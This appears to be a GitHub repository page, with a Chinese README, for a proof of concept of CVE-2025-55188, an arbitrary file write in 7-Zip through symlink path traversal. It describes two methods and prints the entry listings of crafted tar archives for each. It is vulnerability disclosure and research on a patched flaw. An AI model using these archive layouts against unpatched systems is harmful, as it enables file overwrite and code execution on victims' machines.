lunbun/CVE-2025-55188

GitHub: lunbun/CVE-2025-55188

CVE-2025-55188的概念验证代码,展示7-Zip中通过符号链接实现任意文件写入的两种路径遍历方法。

Stars: 7 | Forks: 1

# CVE-2025-55188:7-Zip 任意文件写入 CVE-2025-55188 的概念验证(POC),这是 7-Zip 中的一个任意文件写入漏洞。已在 25.01 版本中修复,发布于 2025 年 8 月 3 日。 请参阅 https://lunbun.dev/blog/cve-2025-55188/ 了解更多详细信息和详细报告。 该漏洞相当简单直接。 通过符号链接进行路径遍历以任意写入文件。从那里开始,任意文件写入可以通过写入关键文件升级为任意代码执行。 由于符号链接安全检查中的一个边缘情况,可以进行符号链接路径遍历。我发现了两种方法可以做到这一点。详见博客文章。 ### 路径遍历方法 1:滥用硬链接 以下 .tar 文件将在解压时写入到 `../a/b/file.txt`: ``` $ tar -tvf write.tar lrw-r--r-- 0/0 0 1969-12-31 16:00 a/link -> ../a/b hrwxr-xr-x 0/0 0 1969-12-31 16:00 link link to a/link -rw-r--r-- 0/0 44 1969-12-31 16:00 link/file.txt ``` `poc_hardlink` 包含使用硬链接方法的代码。 ### 路径遍历方法 2:滥用解压根目录功能 以下 .tar 文件将在解压时写入到 `../file.txt`(仅在 Linux 上): ``` $ tar -tvf write.tar lrw-r--r-- 0/0 0 1969-12-31 16:00 a/b/link -> /a lrw-r--r-- 0/0 0 1969-12-31 16:00 link -> a/b/link/../../ -rw-r--r-- 0/0 44 1969-12-31 16:00 link/file.txt ``` `poc_extraction_root` 包含使用解压根目录方法的代码。
标签:7-Zip, CISA项目, CVE-2025-55188, Go语言工具, hardlink, PoC, symlink, T1566, tar文件, 代码执行, 任意文件写入, 压缩文件攻击, 应用安全, 情报收集, 提取根特征, 搜索语句(dork), 数据展示, 文件操作漏洞, 暴力破解, 概念验证, 漏洞研究, 硬链接, 符号链接攻击, 红队, 网络安全, 路径遍历, 隐私保护